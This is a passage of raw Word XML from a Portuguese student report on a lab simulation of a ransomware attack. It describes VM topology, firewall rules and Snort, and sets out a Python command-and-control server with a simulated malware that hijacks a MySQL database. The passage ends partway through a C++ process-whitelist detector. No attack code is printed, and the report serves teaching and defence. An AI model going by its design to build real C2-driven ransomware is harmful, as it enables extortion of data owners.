        <w:t>, possibilitando o monitoramento do tráfego de rede e a identificação de comportamentos suspeitos. Essa máquina assumiu o papel de gateway da rede, ou seja, todo o tráfego externo destinado à rede privada passava obrigatoriamente por ela.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2235DA6C" w14:textId="2DC729FB" w:rsidR="00A53AF3" w:rsidRPr="00A53AF3" w:rsidRDefault="00A53AF3" w:rsidP="00A53AF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A53AF3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">A segunda máquina virtual foi utilizada para hospedar uma API </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A53AF3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Restful</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A53AF3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> desenvolvida com o framework </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A53AF3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>NestJS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A53AF3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. Essa API simula o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A53AF3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>backend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A53AF3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> de um sistema de gerenciamento de academia, oferecendo rotas específicas para diferentes perfis de usuários, como professores e alunos. Professores podem cadastrar e acompanhar os treinos dos alunos, enquanto os estudantes têm acesso às suas rotinas e histórico de evolução. Para garantir a comunicação com a base de dados, a API foi configurada para se conectar à terceira máquina virtual, que executa uma instância do banco de dados MySQL, onde estão armazenadas as informações de usuários, treinos, metas e registros </w:t>
      </w:r>
      <w:r w:rsidRPr="00A53AF3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>de desempenho</w:t>
      </w:r>
      <w:r w:rsidR="008E2267">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="000115B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Para mais detalhes da implementação do banco de dados e da API, visualizar link do Anexo 6 e Anexo 7.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3CE3E2" w14:textId="49D7D7E9" w:rsidR="00DA16FE" w:rsidRPr="00A53AF3" w:rsidRDefault="00A53AF3" w:rsidP="00A53AF3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A53AF3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">As regras de firewall foram configuradas cuidadosamente em todas as máquinas para garantir a segurança do ambiente. Nas </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A53AF3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>VMs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A53AF3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> da API e do banco de dados, foi utilizado o utilitário UFW para permitir apenas o tráfego essencial: a porta 3333 foi liberada na API para acessos externos, enquanto a comunicação entre API e banco foi autorizada exclusivamente pela porta 3306. Na VM do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A53AF3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>pfSense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A53AF3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, regras adicionais foram aplicadas para reforçar a segurança da rede. Foi configurado um redirecionamento NAT da porta 3333 para a API, garantindo que requisições externas fossem devidamente encaminhadas. Além disso, todas as demais portas e origens externas foram bloqueadas, exceto o tráfego autorizado entre a API e o banco de dados. Essas configurações foram fundamentais para garantir um ambiente funcional e seguro para a simulação dos ataques.</w:t>
      </w:r>
      <w:r w:rsidR="008E2267" w:rsidRPr="008E2267">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E2267">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">O diagrama da topologia da rede pode ser visualizado no Anexo </w:t>
      </w:r>
      <w:r w:rsidR="00A82F7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="008E2267">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3796C644" w14:textId="77777777" w:rsidR="00CE6FDE" w:rsidRDefault="00DA16FE" w:rsidP="008E2267">
      <w:pPr>
        <w:spacing w:before="240"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 SIMULAÇÃO DO ATAQUE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A324C80" w14:textId="73A19582" w:rsidR="00CE6FDE" w:rsidRDefault="00CE6FDE" w:rsidP="00E3279D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Antes de descrever a simulação do ataque, é importante realçarmos alguns pontos. Primeiramente, o intuito da atividade era de fato fazer uma simulação</w:t>
      </w:r>
      <w:r w:rsidR="00E3279D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, então não utilizamos malwares “verdadeiros”, nós desenvolvemos um programa para simular um </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E3279D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ransoware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E3279D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> que se conecta no banco de dados do laboratório, sequestra as informações do banco e envia uma mensagem solicitando o resgate das informações. Segundamente, não consideramos como objeto de estudo o vetor do ataque, ou seja, partimos do pressuposto que o atacante já tem acesso ao sistema e já possui as credenciais de um usuário que possui acesso ao banco.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571C43FD" w14:textId="5155C4F7" w:rsidR="00E3279D" w:rsidRDefault="00E3279D" w:rsidP="00E3279D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Assim, o</w:t>
      </w:r>
      <w:r w:rsidR="00CE6FDE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ataque </w:t>
      </w:r>
      <w:r w:rsidR="00CE6FDE" w:rsidRPr="00CE6FDE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CE6FDE" w:rsidRPr="00CE6FDE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ransomware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CE6FDE" w:rsidRPr="00CE6FDE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CE6FDE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">foi feito por meio de dois programas desenvolvidos em Python: o primeiro programa simula um servidor de C2 e o segundo simula o malware em si, o qual recebe os comandos do servidor e os executa. O primeiro programa foi executado por uma máquina fora </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>do laboratório</w:t>
      </w:r>
      <w:r w:rsidR="00CE6FDE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> e o segundo programa foi executado na VM do banco de dados.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Para mais informações sobre a implementação dos respectivos programas, consulte os Anexos </w:t>
      </w:r>
      <w:r w:rsidR="00862EB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e </w:t>
      </w:r>
      <w:r w:rsidR="00862EB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A simulação do ataque foi gravada e pode ser acessada no link contido no Anexo </w:t>
      </w:r>
      <w:r w:rsidR="00862EB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="00862EBB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA304E1" w14:textId="7F8DB32B" w:rsidR="00CE6FDE" w:rsidRPr="00CE6FDE" w:rsidRDefault="00E3279D" w:rsidP="00E3279D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Vale comentar que o programa que simula o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ransomware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> é bem simples: ele só executa comandos SQL. Chegamos a implementar um programa que conseguia executar comando no terminal, mas dadas as considerações gerais, decidimos simplificá-lo. O servidor C2 foi desenvolvido usando a biblioteca “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">” do Python e é um </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>programa muito simples. Temos ciências que malwares possuem comportamentos mais sofisticados, mas para o escopo do estudo os programas cumprem com o objetivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D54CC6" w14:textId="65B6F541" w:rsidR="00DA16FE" w:rsidRDefault="00DA16FE" w:rsidP="008E2267">
      <w:pPr>
        <w:spacing w:before="240"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 DETECÇÃO DO ATAQUE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377A55FD" w14:textId="548E8E51" w:rsidR="00934243" w:rsidRDefault="00934243" w:rsidP="008E2267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934243">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">A fim de detectar </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">o malware implementado na simulação do ataque, desenvolvemos um programa em C++, cuja função é verificar se os processos que estão rodando na VM do banco de dados estão presentes em uma lista de processos padrão ou não. Caso o processo não esteja na lista, ele é considerado malicioso. Se o programa não encontrar processos maliciosos, ele avisa que não foram encontrados processos maliciosos. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EE2553" w14:textId="131C644A" w:rsidR="00DA16FE" w:rsidRPr="00330273" w:rsidRDefault="00934243" w:rsidP="0033027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estratégia para a detecção do ataca parte do pressuposto que a infraestrutura do laboratório é simples e nós sabemos quais serviços estão rodando em cada máquina. Logo, temos uma previsibilidade muito grande de quais processos rodam em cada máquina. Assim, desenvolvemos um script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> para listar todos os processos que rodam normalmente no sistema, incluindo o programa de detecção desenvolvido. Dessa forma, quando um programa</w:t>
      </w:r>
      <w:r w:rsidR="008E2267">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> não contido na lista é executado, grandes chances de ele ser malicioso. Para mais informações sobre a implementação do programa de detecção e do script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E2267">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008E2267">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, consultar os Anexos X e Y, respectivamente. Além disso, um vídeo com a demonstração da detecção do ataque pode ser visualizado com o link do Anexo Z.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF7C5CB" w14:textId="431F899E" w:rsidR="00DA16FE" w:rsidRDefault="00330273" w:rsidP="00300E1E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</w:t>
      </w:r>
      <w:r w:rsidR="00DA16FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. CONCLUSÃO </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2663E45B" w14:textId="77777777" w:rsidR="00300E1E" w:rsidRPr="00300E1E" w:rsidRDefault="00300E1E" w:rsidP="00300E1E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300E1E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">A realização desta atividade acadêmica permitiu compreender de forma prática os mecanismos envolvidos em ataques de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00300E1E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ransomware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00300E1E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, bem como explorar técnicas de defesa e prevenção em um ambiente controlado. A construção do laboratório com máquinas virtuais possibilitou a simulação de um cenário realista, no qual foi possível configurar componentes de segurança, implementar uma API funcional e integrar um banco de dados, criando uma infraestrutura representativa de sistemas reais utilizados em organizações.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613C44FB" w14:textId="77777777" w:rsidR="00300E1E" w:rsidRPr="00300E1E" w:rsidRDefault="00300E1E" w:rsidP="00300E1E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300E1E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">A simulação do ataque, por meio de um malware desenvolvido em Python e operado por um servidor de comando e controle, evidenciou as vulnerabilidades que podem ser exploradas quando há falhas de configuração ou ausência de monitoramento adequado. A implementação do IDS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00300E1E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Snort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00300E1E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> e o desenvolvimento de um programa de detecção de processos maliciosos demonstraram, na prática, a importância de ferramentas que possibilitam identificar comportamentos anômalos na rede ou no sistema, reforçando o valor da análise preventiva e da detecção precoce de ameaças.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2609A891" w14:textId="0F5065E5" w:rsidR="00DA16FE" w:rsidRPr="00300E1E" w:rsidRDefault="00300E1E" w:rsidP="00300E1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00E1E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Por fim, o trabalho destacou a relevância do conhecimento técnico aliado à consciência sobre boas práticas de segurança. A combinação de políticas de firewall, segmentação de rede, monitoramento ativo e detecção de ameaças se mostrou eficaz na mitigação de riscos. Esta experiência reforçou o papel essencial da educação prática na formação de profissionais de segurança da informação, proporcionando aos alunos uma vivência próxima dos desafios enfrentados no combate a ataques cibernéticos como o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00300E1E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ransomware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00300E1E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00862EBB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Os arquivos com as implementações dos códigos podem ser acessados pelo link do repositório do Anexo 6.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A908D4A" w14:textId="77777777" w:rsidR="00862EBB" w:rsidRDefault="00862EBB" w:rsidP="00DA16F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7E64DDF" w14:textId="77777777" w:rsidR="00862EBB" w:rsidRDefault="00862EBB" w:rsidP="00DA16F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2DFF27D" w14:textId="77777777" w:rsidR="00862EBB" w:rsidRDefault="00862EBB" w:rsidP="00DA16F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5B4AAE8" w14:textId="77777777" w:rsidR="00862EBB" w:rsidRDefault="00862EBB" w:rsidP="00DA16F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E9D9D65" w14:textId="77777777" w:rsidR="00862EBB" w:rsidRDefault="00862EBB" w:rsidP="00DA16F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D2DAA25" w14:textId="77777777" w:rsidR="00862EBB" w:rsidRDefault="00862EBB" w:rsidP="00DA16F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DB6EE26" w14:textId="77777777" w:rsidR="00862EBB" w:rsidRDefault="00862EBB" w:rsidP="00DA16F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E10025E" w14:textId="77777777" w:rsidR="00862EBB" w:rsidRDefault="00862EBB" w:rsidP="00DA16F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ADABF1A" w14:textId="77777777" w:rsidR="00862EBB" w:rsidRDefault="00862EBB" w:rsidP="00DA16F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43E45B1" w14:textId="77777777" w:rsidR="00862EBB" w:rsidRDefault="00862EBB" w:rsidP="00DA16F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56A724F" w14:textId="77777777" w:rsidR="00862EBB" w:rsidRDefault="00862EBB" w:rsidP="00DA16F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002C84F" w14:textId="77777777" w:rsidR="00862EBB" w:rsidRDefault="00862EBB" w:rsidP="00DA16F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3390D04" w14:textId="77777777" w:rsidR="00862EBB" w:rsidRDefault="00862EBB" w:rsidP="00DA16F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52C650A" w14:textId="77777777" w:rsidR="00862EBB" w:rsidRDefault="00862EBB" w:rsidP="00DA16F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549A564" w14:textId="77777777" w:rsidR="00862EBB" w:rsidRDefault="00862EBB" w:rsidP="00DA16F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33EF4D5" w14:textId="77777777" w:rsidR="00862EBB" w:rsidRDefault="00862EBB" w:rsidP="00DA16F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9801393" w14:textId="77777777" w:rsidR="00862EBB" w:rsidRDefault="00862EBB" w:rsidP="00DA16F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633B6EE" w14:textId="77777777" w:rsidR="000115B5" w:rsidRDefault="000115B5" w:rsidP="00DA16F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20089CD" w14:textId="08D6F4F5" w:rsidR="00DA16FE" w:rsidRDefault="00DA16FE" w:rsidP="00DA16FE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ANEXOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABAE45A" w14:textId="5BF0E484" w:rsidR="00A82F7B" w:rsidRDefault="00A82F7B" w:rsidP="00DA16FE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ANEXO 1</w:t>
      </w:r>
      <w:r w:rsidR="00862EBB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> – Diagrama da Topologia do Laboratório</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CE5159" w14:textId="437B8920" w:rsidR="006E0A25" w:rsidRDefault="00A82F7B" w:rsidP="00862EBB">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00A82F7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46F6A0AA" wp14:editId="18868D6D">
            <wp:extent cx="5400040" cy="2902585"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="121960962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09629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A00C" w14:textId="77777777" w:rsidR="00862EBB" w:rsidRPr="00862EBB" w:rsidRDefault="00862EBB" w:rsidP="00862EBB">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69EC44A3" w14:textId="54B4A3B2" w:rsidR="00A82F7B" w:rsidRDefault="00A82F7B" w:rsidP="00DA16FE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ANEXO 2</w:t>
      </w:r>
      <w:r w:rsidR="006E0A25">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="006E0A25" w:rsidRPr="006E0A25">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Código para detectar o malware (detect2.cpp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A485DE" w14:textId="7F0E0630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>#include &lt;bits/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stdc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++.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB072CA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>#include &lt;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filesystem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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45305A64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>#include &lt;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dirent.h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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B089235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>#include &lt;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unistd.h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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DDD9F7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>#include &lt;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algorithm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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FFA2FC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</w:p>
    <w:p w14:paraId="111C779D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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E0A25">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>using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namespace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std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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C258241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</w:p>
    <w:p w14:paraId="16029E47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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E0A25">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>string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trim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(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const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string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&amp; s) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7ED923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string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result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= s;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065D21A2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auto start =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find_if_not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(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s.begin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(),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s.end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(), [](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unsigned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char c){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return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isspace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(c);});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDFF887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auto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end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=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find_if_not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(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s.rbegin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(),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s.rend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(), [](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unsigned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char c){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return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isspace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(c);}).base();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544E211E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</w:p>
    <w:p w14:paraId="54596014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if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(start &gt;=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end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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C7B37D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return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"";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3D7C2F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</w:p>
    <w:p w14:paraId="14D1CC47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return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string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(start,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end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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9671EB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>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599D3211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</w:p>
    <w:p w14:paraId="7E968D04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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E0A25">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>unordered_set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&lt;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string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&gt;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load_whitelist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(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const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string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&amp; arquivo) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70ACC04C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unordered_set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&lt;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string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&gt; lista;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5A088A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ifstream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infile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(arquivo);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F066362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string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linha;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431F8ADB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</w:p>
    <w:p w14:paraId="2C1ECEBF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if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(!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infile.is_open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()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EE5166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cerr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&lt;&lt; "Erro ao abrir o arquivo\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B591FE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return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lista;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AE923F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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712D2D9C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</w:p>
    <w:p w14:paraId="6D3BB8BF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while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(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getline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(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infile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, linha)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272B79FD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if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(!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linha.empty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()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F3A977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    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lista.insert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(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trim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(linha));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B909CE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        //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cout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&lt;&lt;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trim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(linha) &lt;&lt; "\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB9F9EF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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B5EDFC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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F77C42C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</w:p>
    <w:p w14:paraId="70ADADD7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return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lista;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F2F37C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>}</w:t>
      </w:r>
    </w:p>
